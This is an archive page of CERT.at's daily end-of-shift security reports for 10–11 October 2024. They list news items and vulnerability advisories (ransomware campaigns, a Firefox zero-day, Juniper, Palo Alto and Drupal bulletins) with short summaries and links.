http://www.zerodayinitiative.com/advisories/ZDI-24-1369/ ∗∗∗ Security Vulnerability fixed in Firefox 131.0.3 ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2024-53/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 11.10.2024
by Daily end-of-shift report 11 Oct '24

11 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 10-10-2024 18:00 − Freitag 11-10-2024 18:00 Handler: Robert Waldner Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Akira and Fog ransomware now exploit critical Veeam RCE flaw ∗∗∗ --------------------------------------------- Ransomware gangs now exploit a critical security vulnerability that lets attackers gain remote code execution (RCE) on vulnerable Veeam Backup & Replication (VBR) servers. --------------------------------------------- https://www.bleepingcomputer.com/news/security/akira-and-fog-ransomware-now… ∗∗∗ Digitaler Krieg: Russische Hacker sollen Zimbra- und Teamcity-Exploits nutzen ∗∗∗ --------------------------------------------- Staatliche russische Hacker nähmen Zimbra- und Jetbrains Teamcity-Installationen westlicher Unternehmen aufs Korn, warnen die USA und Großbritannien. --------------------------------------------- https://www.golem.de/news/digitaler-krieg-russische-hacker-sollen-zimbra-un… ∗∗∗ Bohemia and Cannabia Dark Web Markets Taken Down After Joint Police Operation ∗∗∗ --------------------------------------------- The Dutch police have announced the takedown of Bohemia and Cannabia, which has been described as the worlds largest and longest-running dark web market for illegal goods, drugs, and cybercrime services.The takedown is the result of a collaborative investigation with Ireland, the United Kingdom, and the United States that began towards the end of 2022, the Politie said. --------------------------------------------- https://thehackernews.com/2024/10/bohemia-and-cannabia-dark-web-markets.html ∗∗∗ Perfecting Ransomware on AWS — Using keys to the kingdom to change the locks ∗∗∗ --------------------------------------------- If someone asked me what was the best way to make money from a compromised AWS Account (assume root access even) — I would have answered “dump the data and hope that no-one notices you before you finish it up.” This answer would have been valid until ~8 months ago when I stumbled upon a lesser known feature of AWS KMS which allows an attacker to do devastating ransomware attacks on a compromised AWS account. --------------------------------------------- https://medium.com/@harsh8v/redefining-ransomware-attacks-on-aws-using-aws-… ∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (September 30, 2024 to October 6, 2024) ∗∗∗ --------------------------------------------- Last week, there were 161 vulnerabilities disclosed in 147 WordPress Plugins and 5 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database --------------------------------------------- https://www.wordfence.com/blog/2024/10/wordfence-intelligence-weekly-wordpr… ∗∗∗ Lynx Ransomware: A Rebranding of INC Ransomware ∗∗∗ --------------------------------------------- Lynx ransomware shares a significant portion of its source code with INC ransomware. INC ransomware initially surfaced in August 2023 and had variants compatible with both Windows and Linux. While we haven't confirmed any Linux samples yet for Lynx ransomware, we have noted Windows samples. This ransomware operates using a ransomware-as-a-service (RaaS) model. --------------------------------------------- https://unit42.paloaltonetworks.com/inc-ransomware-rebrand-to-lynx/ ∗∗∗ Octo2 Malware Uses Fake NordVPN, Chrome Apps to Infect Android Devices ∗∗∗ --------------------------------------------- Octo2 malware is targeting Android devices by disguising itself as popular apps like NordVPN and Google Chrome. --------------------------------------------- https://hackread.com/octo2-malware-fake-nordvpn-chrome-apps-android-device/ ∗∗∗ Best Practices to Configure BIG-IP LTM Systems to Encrypt HTTP Persistence Cookies ∗∗∗ --------------------------------------------- CISA has observed cyber threat actors leveraging unencrypted persistent cookies managed by the F5 BIG-IP Local Traffic Manager (LTM) module to enumerate other non-internet facing devices on the network. [..] CISA urges organizations to encrypt persistent cookies employed in F5 BIG-IP devices and review the following article for details on how to configure the BIG-IP LTM system to encrypt HTTP cookies. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/10/10/best-practices-configure… ∗∗∗ EU-Rat bringt Cyber Resilience Act auf den Weg ∗∗∗ --------------------------------------------- Künftig müssen vernetzte Produkte, die in der EU in Verkehr gebracht werden, gegen Angriffe gesichert sein und das mit dem CE-Zeichen signalisieren. --------------------------------------------- https://heise.de/-9977103 ===================== = Vulnerabilities = ===================== ∗∗∗ New Critical GitLab Vulnerability Could Allow Arbitrary CI/CD Pipeline Execution ∗∗∗ --------------------------------------------- GitLab has released security updates for Community Edition (CE) and Enterprise Edition (EE) to address eight security flaws, including a critical bug that could allow running Continuous Integration and Continuous Delivery (CI/CD) pipelines on arbitrary branches. --------------------------------------------- https://thehackernews.com/2024/10/new-critical-gitlab-vulnerability-could.h… ∗∗∗ Priviledged admin able to view device summary for device in different [FortiManager] ADOM ∗∗∗ --------------------------------------------- An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in FortiManager Administrative Domain (ADOM) may allow a remote authenticated attacker assigned to an ADOM to access device summary of other ADOMs via crafted HTTP requests. --------------------------------------------- https://fortiguard.fortinet.com/psirt/FG-IR-23-472 ∗∗∗ Aw, Sugar. Critical Vulnerabilities in SugarWOD ∗∗∗ --------------------------------------------- It is possible to: * Enumerate 2 million users, names, profile pics, birthday, height, weight, and email addresses * Extract all Gyms join passwords [..] * Bypass user-chosen privacy settings --------------------------------------------- https://www.n00py.io/2024/10/critical-vulnerabilities-in-sugarwod/ ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (.NET 6.0, .NET 8.0, and openssl), Debian (firefox-esr), Fedora (firefox), Mageia (php, quictls, and vim), Red Hat (buildah, container-tools:rhel8, containernetworking-plugins, firefox, podman, skopeo, and tomcat), Slackware (mozilla), SUSE (apache-commons-io, kernel, and xen), and Ubuntu (golang-1.17, libgsf, and linux-aws-6.8, linux-oracle-6.8). --------------------------------------------- https://lwn.net/Articles/993778/ ∗∗∗ Security Vulnerability fixed in Thunderbird 131.0.1, Thunderbird 128.3.1, Thunderbird 115.16.0 ∗∗∗ --------------------------------------------- * CVE-2024-9680: Use-after-free in Animation timeline --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2024-52/ ∗∗∗ Livewire Security Update Advisory (CVE-2024-47823) ∗∗∗ --------------------------------------------- The extension of a loaded file is guessed based on its MIME type, which could allow an attacker to conduct a remote code execution (RCE) attack by uploading a “.php” file with a valid MIME type. --------------------------------------------- https://asec.ahnlab.com/en/83775/ ∗∗∗ Apache Software Security Update Advisory (CVE-2024-45720, CVE-2024-47561) ∗∗∗ --------------------------------------------- * CVE-2024-45720: Subversion versions: ~ 1.14.3 (inclusive) (Windows) * CVE-2024-47561: Apache Avro Java SDK versions: ~ 1.11.4 (excluded) --------------------------------------------- https://asec.ahnlab.com/en/83776/ ∗∗∗ Anonymisierendes Linux: Tails 6.8.1 schließt kritische Sicherheitslücke ∗∗∗ --------------------------------------------- Das zum anonymen Surfen gedachte Tails-Linux schließt in Version 6.8.1 eine Sicherheitslücke. Es verbessert zudem den Umgang mit persistentem Speicher. --------------------------------------------- https://heise.de/-9977905 ∗∗∗ baserCMS plugin "BurgerEditor" vulnerable to directory listing ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN54676967/ ∗∗∗ ABB Cylon Aspect 3.07.02 (sshUpdate.php) Unauthenticated Remote SSH Service Control ∗∗∗ --------------------------------------------- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5838.php -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 10.10.2024
by Daily end-of-shift report 10 Oct '24

10 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 09-10-2024 18:00 − Donnerstag 10-10-2024 18:00 Handler: Robert Waldner Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Firefox Zero-Day Under Attack: Update Your Browser Immediately ∗∗∗ --------------------------------------------- Mozilla has revealed that a critical security flaw impacting Firefox and Firefox Extended Support Release (ESR) has come under active exploitation in the wild.The vulnerability, tracked as CVE-2024-9680, has been described as a use-after-free bug in the Animation timeline component. --------------------------------------------- https://thehackernews.com/2024/10/mozilla-warns-of-active-exploitation-in.h… ∗∗∗ CISA says critical Fortinet RCE flaw now exploited in attacks ∗∗∗ --------------------------------------------- Today, CISA revealed that attackers actively exploit a critical FortiOS remote code execution (RCE) vulnerability in the wild. --------------------------------------------- https://www.bleepingcomputer.com/news/security/cisa-says-critical-fortinet-… ∗∗∗ Benutzt hier jemand ein Smartphone mit Qualcomm-SOC? ∗∗∗ --------------------------------------------- Für viele Android-Geräte da draußen ist die Antwort: Ja.The zero-day vulnerability, officially designated CVE-2024-43047, “may be under limited, targeted exploitation,” according to Qualcomm, citing unspecified “indications” from Google’s Threat Analysis Group, the company’s research unit that investigates government hacking threats. --------------------------------------------- http://blog.fefe.de/?ts=99f9d232 ∗∗∗ Magenta ID wurde deaktiviert: Vorsicht vor täuschend echter Phishing-Mail ∗∗∗ --------------------------------------------- Ein sehr gut gefälschtes Magenta-Mail ist gerade in Österreich in Umlauf. Wer genau hinsieht, kann es entlarven. --------------------------------------------- https://futurezone.at/digital-life/magenta-id-wurde-deaktiviert-mail-phishi… ∗∗∗ Malware by the (Bit)Bucket: Unveiling AsyncRAT ∗∗∗ --------------------------------------------- Recently, we uncovered a sophisticated attack campaign employing a multi-stage approach to deliver AsyncRAT via a legitimate platform called Bitbucket. --------------------------------------------- https://www.gdatasoftware.com/blog/2024/10/38043-asyncrat-bitbucket ∗∗∗ File hosting services misused for identity phishing ∗∗∗ --------------------------------------------- Since mid-April 2024, Microsoft has observed an increase in defense evasion tactics used in campaigns abusing file hosting services like SharePoint, OneDrive, and Dropbox. These campaigns use sophisticated techniques to perform social engineering, evade detection, and compromise identities, and include business email compromise (BEC) attacks. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2024/10/08/file-hosting-servi… ∗∗∗ Technical Analysis of DarkVision RAT ∗∗∗ --------------------------------------------- IntroductionDarkVision RAT is a highly customizable remote access trojan (RAT) that first surfaced in 2020, offered on Hack Forums and their website for as little as $60. Written in C/C++, and assembly, DarkVision RAT has gained popularity due to its affordability and extensive feature set, making it accessible even to low-skilled cybercriminals. The RAT’s capabilities include keylogging, taking screenshots, file manipulation, process injection, remote code execution, and password theft. --------------------------------------------- https://www.zscaler.com/blogs/security-research/technical-analysis-darkvisi… ∗∗∗ Ransom & Dark Web Issues Week 2, October 2024 ∗∗∗ --------------------------------------------- * New Target of KillSec Ransomware Attack: South Korean Commercial Property Content Provider * Dark Web Market Bohemia/Cannabia Shut Down by Law Enforcement, Two Administrators Arrested * New Ransomware Gang Sarcoma: Conducted Attacks on a Total of 30 Companies --------------------------------------------- https://asec.ahnlab.com/en/83739/ ∗∗∗ Internet Archive unter Beschuss: Über 30 Millionen Nutzerdaten gestohlen ∗∗∗ --------------------------------------------- Bislang Unbekannte vergriffen sich mehrfach am Internet Archive. Bereits im September wurden Nutzerdaten und Passwort-Hashes abgezogen. --------------------------------------------- https://heise.de/-9975986 ===================== = Vulnerabilities = ===================== ∗∗∗ GitLab warns of critical arbitrary branch pipeline execution flaw ∗∗∗ --------------------------------------------- GitLab has released security updates to address multiple flaws in Community Edition (CE) and Enterprise Edition (EE), including a critical arbitrary branch pipeline execution flaw. --------------------------------------------- https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-arb… ∗∗∗ Experts Warn of Critical Unpatched Vulnerability in Linear eMerge E3 Systems ∗∗∗ --------------------------------------------- Cybersecurity security researchers are warning about an unpatched vulnerability in Nice Linear eMerge E3 access controller systems that could allow for the execution of arbitrary operating system (OS) commands.The flaw, assigned the CVE identifier CVE-2024-9441, carries a CVSS score of 9.8 out of a maximum of 10.0, according to VulnCheck. --------------------------------------------- https://thehackernews.com/2024/10/experts-warn-of-critical-unpatched.html ∗∗∗ wkhtmltopdf - Highly critical - Unsupported - SA-CONTRIB-2024-049 ∗∗∗ --------------------------------------------- Project: wkhtmltopdfDate: 2024-October-09Security risk: Highly critical 23 ∕ 25 AC:None/A:None/CI:All/II:All/E:Proof/TD:AllVulnerability: UnsupportedAffected versions: *Description: The security team is marking this project unsupported. There is a known security issue with the project that has not been fixed by the maintainer. If you would like to maintain this project, please read: https://www.drupal.org/node/251466#procedure---own-project---unsupportedSol…: If you use this project, --------------------------------------------- https://www.drupal.org/sa-contrib-2024-049 ∗∗∗ Facets - Critical - Cross Site Scripting - SA-CONTRIB-2024-047 ∗∗∗ --------------------------------------------- Project: FacetsDate: 2024-October-09Security risk: Critical 15 ∕ 25 AC:Basic/A:None/CI:Some/II:Some/E:Theoretical/TD:DefaultVulnerability: Cross Site ScriptingAffected versions: Description: This module enables you to to easily create and manage faceted search interfaces.The module doesnt sufficiently filter for malicious script leading to a reflected cross site scripting (XSS) vulnerability.Solution: Install the latest version:If you use the Facets module, upgrade to Facets --------------------------------------------- https://www.drupal.org/sa-contrib-2024-047 ∗∗∗ Block permissions - Moderately critical - Access bypass - SA-CONTRIB-2024-046 ∗∗∗ --------------------------------------------- Project: Block permissionsDate: 2024-October-09Security risk: Moderately critical 13 ∕ 25 AC:Basic/A:Admin/CI:Some/II:Some/E:Theoretical/TD:AllVulnerability: Access bypassAffected versions: >=1.0.0 Description: This module enables you to manage blocks from specific modules in the specific themes.The module doesnt sufficiently check permissions under the scenario when a block is added using the form "/admin/structure/block/add/{plugin_id}/{theme}" (route --------------------------------------------- https://www.drupal.org/sa-contrib-2024-046 ∗∗∗ Monster Menus - Moderately critical - Access bypass, Information Disclosure - SA-CONTRIB-2024-045 ∗∗∗ --------------------------------------------- Project: Monster MenusDate: 2024-October-09Security risk: Moderately critical 13 ∕ 25 AC:None/A:None/CI:Some/II:None/E:Theoretical/TD:UncommonVulnerability: Access bypass, Information DisclosureAffected versions: Description: This module enables you to group nodes within pages that have a highly-granular, distributed permissions structure.A function which can be used by third-party code does not return valid data under certain rare circumstances. If the third-party code relies on this --------------------------------------------- https://www.drupal.org/sa-contrib-2024-045 ∗∗∗ Gutenberg - Moderately critical - Cross Site Request Forgery - SA-CONTRIB-2024-048 ∗∗∗ --------------------------------------------- Project: GutenbergDate: 2024-October-09Security risk: Moderately critical 12 ∕ 25 AC:Basic/A:None/CI:None/II:Some/E:Theoretical/TD:DefaultVulnerability: Cross Site Request ForgeryAffected versions: =3.0.0 Description: This module provides a new UI experience for node editing using the Gutenberg Editor library.The module did not sufficiently protect some routes against a Cross Site Request Forgery attack.This vulnerability is mitigated by the fact that the tricked user needs to have an --------------------------------------------- https://www.drupal.org/sa-contrib-2024-048 ∗∗∗ VMSA-2024-0020:VMware NSX updates address multiple vulnerabilities (CVE-2024-38818, CVE-2024-38817, CVE-2024-38815) ∗∗∗ --------------------------------------------- Multiple vulnerabilities in VMware NSX were responsibly reported to VMware. Updates are available to remediate these vulnerabilities in the affected VMware products. --------------------------------------------- https://support.broadcom.com/web/ecx/support-=content-notification/-/extern… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (chromium), Fedora (firefox, koji, unbound, webkit2gtk4.0, and xen), Red Hat (glibc, net-snmp, and tomcat), Slackware (mozilla), SUSE (apache-commons-io, buildah, cups-filters, liboath-devel, libreoffice, libunbound8, podman, and redis), and Ubuntu (cups-browsed, cups-filters, edk2, linux-raspi-5.4, and oath-toolkit). --------------------------------------------- https://lwn.net/Articles/993595/ ∗∗∗ Redis Vulnerability Security Update Advisory (CVE-2024-31449) ∗∗∗ --------------------------------------------- An update has been released to address vulnerabilities in Redis. Users of the affected versions are advised to update to the latest version. --------------------------------------------- https://asec.ahnlab.com/en/83704/ ∗∗∗ Ivanti Product Security Update Advisory ∗∗∗ --------------------------------------------- * CVE-2024-9380, CVE-2024-9381: Ivanti Cloud Services Appliance (CSA) versions: ~ 5.0.1 (inclusive) * CVE-2024-7612: Ivanti EPMM (Core) versions: ~ 12.1.0.3 (inclusive) * CVE-2024-9167: Velocity License Server versions: 5.1 (inclusive) ~ 5.1.2 (inclusive) --------------------------------------------- https://asec.ahnlab.com/en/83706/ ∗∗∗ Adobe Family October 2024 Routine Security Update Advisory ∗∗∗ --------------------------------------------- Adobe has released a security update that addresses a vulnerability in its supplied products. Users of affected systems are advised to update to the latest version. --------------------------------------------- https://asec.ahnlab.com/en/83710/ ∗∗∗ SAP Product Security Update Advisory ∗∗∗ --------------------------------------------- * CVE-2024-37179: SAP BusinessObjects Business Intelligence Platform, ENTERPRISE 420, 430, 2025, Enterprise clienttools 420 * CVE-2024-41730: SAP BusinessObjects Business Intelligence Platform, ENTERPRISE 430, 440 * CVE-2024-39592: SAP PDCE, S4CORE 102, S4CORE 103, S4COREOP 104, S4COREOP 105, S4COREOP 106, S4COREOP 107, S4COREOP 108 --------------------------------------------- https://asec.ahnlab.com/en/83736/ ∗∗∗ SonicWall SSL-VPN SMA1000 and Connect Tunnel Windows Client Affected By Multiple Vulnerabilities ∗∗∗ --------------------------------------------- 1) CVE-2024-45315 - SonicWALL SMA1000 Connect Tunnel Windows Client Link Following Denial-of-Service Vulnerability 2) CVE-2024-45316 - SonicWALL SMA1000 Connect Tunnel Windows Client Link Following Local Privilege Escalation Vulnerability 3) CVE-2024-45317 - Unauthenticated SMA1000 12.4.x Server-Side Request Forgery (SSRF) Vulnerability --------------------------------------------- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0017 ∗∗∗ CISA Releases Twenty-One Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- * ICSA-24-284-01 Siemens SIMATIC S7-1500 and S7-1200 CPUs * ICSA-24-284-02 Siemens Simcenter Nastran * ICSA-24-284-03 Siemens Teamcenter Visualization and JT2Go * ICSA-24-284-04 Siemens SENTRON PAC3200 Devices * ICSA-24-284-05 Siemens Questa and ModelSim * ICSA-24-284-06 Siemens SINEC Security Monitor * ICSA-24-284-07 Siemens JT2Go * ICSA-24-284-08 Siemens HiMed Cockpit * ICSA-24-284-09 Siemens PSS SINCAL * ICSA-24-284-10 Siemens SIMATIC S7-1500 CPUs * ICSA-24-284-11 Siemens RUGGEDCOM APE1808 * ICSA-24-284-12 Siemens Sentron Powercenter 1000 * ICSA-24-284-13 Siemens Tecnomatix Plant Simulation * ICSA-24-284-14 Schneider Electric Zelio Soft 2 * ICSA-24-284-15 Rockwell Automation DataMosaix Private Cloud * ICSA-24-284-16 Rockwell Automation DataMosaix Private Cloud * ICSA-24-284-17 Rockwell Automation Verve Asset Manager * ICSA-24-284-18 Rockwell Automation Logix Controllers * ICSA-24-284-19 Rockwell Automation PowerFlex 6000T * ICSA-24-284-20 Rockwell Automation ControlLogix * ICSA-24-284-21 Delta Electronics CNCSoft-G2 --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/10/10/cisa-releases-twenty-one… ∗∗∗ Synacor Zimbra Collaboration Command Execution Vulnerability ∗∗∗ --------------------------------------------- Threat Actors are exploiting a recently fixed RCE vulnerability in Zimbra email servers, which can be exploited just by sending specially crafted emails to the SMTP server. --------------------------------------------- https://fortiguard.fortinet.com/outbreak-alert/zimbra-collaboration-rce ∗∗∗ Gutenberg - Moderately critical - Cross Site Request Forgery - SA-CONTRIB-2024-048 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-048 ∗∗∗ 2024-10-10: Cyber Security Advisory - ABB IRC5 RobotWare – PROFINET Stack Vulnerability ∗∗∗ --------------------------------------------- https://search.abb.com/library/Download.aspx?DocumentID=SI20337&LanguageCod… ∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: BGP update message containing aggregator attribute with an ASN value of zero (0) is accepted (CVE-2024-47507) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS: SRX Series: A large amount of traffic being processed by ATP Cloud can lead to a PFE crash (CVE-2024-47506) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: Specific low privileged CLI commands and SNMP GET requests can trigger a resource leak ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS: Multiple vulnerabilities in OSS component nginx resolved ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS: SRX5000 Series: Receipt of a specific malformed packet will cause a flowd crash (CVE-2024-47504) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS: SRX4600 and SRX5000 Series: Sequence of specific PIM packets causes a flowd crash (CVE-2024-47503) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: TCP session state is not always cleared on the Routing Engine (CVE-2024-47502) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS: MX304, MX with MPC10/11/LC9600, and EX9200 with EX9200-15C: In a VPLS or Junos Fusion scenario specific show commands cause an FPC crash (CVE-2024-47501) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: In a BMP scenario receipt of a malformed AS PATH attribute can cause an RPD core (CVE-2024-47499) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: QFX5000 Series: Configured MAC learning and move limits are not in effect (CVE-2024-47498) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS: SRX Series, QFX Series, MX Series and EX Series: Receiving specific HTTPS traffic causes resource exhaustion (CVE-2024-47497) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS: MX Series: The PFE will crash on running specific command (CVE-2024-47496) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: In a dual-RE scenario a locally authenticated attacker with shell privileges can take over the device (CVE-2024-47495) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS: Due to a race condition AgentD process causes a memory corruption and FPC reset (CVE-2024-47494) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS: J-Web: Multiple vulnerabilities resolved in PHP software. ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS: SRX5K, SRX4600 and MX Series: Trio-based FPCs: Continuous physical interface flaps causes local FPC to crash (CVE-2024-47493) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: Receipt of a specific malformed BGP path attribute leads to an RPD crash (CVE-2024-47491) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: ACX 7000 Series: Receipt of specific transit MPLS packets causes resources to be exhausted (CVE-2024-47490) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: Multiple vulnerabilities resolved in c-ares 1.18.1 ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: ACX Series: Receipt of specific transit protocol packets is incorrectly processed by the RE (CVE-2024-47489) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos Space: Remote Command Execution (RCE) vulnerability in web application (CVE-2024-39563) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: cRPD: Receipt of crafted TCP traffic can trigger high CPU utilization (CVE-2024-39547) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS: Multiple vulnerabilities resolved in OpenSSL ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: Low privileged local user able to view NETCONF traceoptions files (CVE-2024-39544) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: Connections to the network and broadcast address accepted (CVE-2024-39534) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS: SRX Series: Low privileged user able to access sensitive information on file system (CVE-2024-39527) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: MX Series with MPC10/MPC11/LC9600, MX304, EX9200, PTX Series: Receipt of malformed DHCP packets causes interfaces to stop processing packets (CVE-2024-39526) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: When BGP nexthop traceoptions is enabled, receipt of specially crafted BGP packet causes RPD crash (CVE-2024-39525) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: Junos OS and Junos OS Evolved: Receipt of a specifically malformed BGP packet causes RPD crash when segment routing is enabled (CVE-2024-39516) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: With BGP traceoptions enabled, receipt of specially crafted BGP update causes RPD crash (CVE-2024-39515) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos Space: OS command injection vulnerability in OpenSSH (CVE-2023-51385) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: With BGP traceoptions enabled, receipt of specifically malformed BGP update causes RPD crash (CVE-2024-39516) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: In a BMP scenario receipt of a malformed AS PATH attribute can cause an RPD core (CVE-2024-47499) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: When BGP traceoptions is enabled, receipt of specially crafted BGP packet causes RPD crash (CVE-2024-39525) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos… ∗∗∗ SSA-438590 V1.0: Buffer Overflow Vulnerability in Siveillance Video Camera Drivers ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-438590.html ∗∗∗ CVE-2024-9469 Cortex XDR Agent: Local Windows User Can Disable the Agent (Severity: MEDIUM) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/CVE-2024-9469 ∗∗∗ CVE-2024-9471 PAN-OS: Privilege Escalation (PE) Vulnerability in XML API (Severity: MEDIUM) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/CVE-2024-9471 ∗∗∗ CVE-2024-9468 PAN-OS: Firewall Denial of Service (DoS) via a Maliciously Crafted Packet (Severity: HIGH) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/CVE-2024-9468 ∗∗∗ PAN-SA-2024-0010 Expedition: Multiple Vulnerabilities Lead to Firewall Admin Account Takeover (Severity: CRITICAL) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/PAN-SA-2024-0010 ∗∗∗ CVE-2024-9473 GlobalProtect App: Local Privilege Escalation (PE) Vulnerability (Severity: MEDIUM) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/CVE-2024-9473 ∗∗∗ PAN-SA-2024-0011 Chromium: Monthly Vulnerability Updates (Severity: HIGH) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/PAN-SA-2024-0011 ∗∗∗ CVE-2024-9470 Cortex XSOAR: Information Disclosure Vulnerability (Severity: MEDIUM) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/CVE-2024-9470 ∗∗∗ PAN-SA-2024-0010 Expedition: Multiple Vulnerabilities in Expedition Lead to Exposure of Firewall Credentials (Severity: CRITICAL) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/PAN-SA-2024-0010 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 09.10.2024
by Daily end-of-shift report 09 Oct '24

09 Oct '24

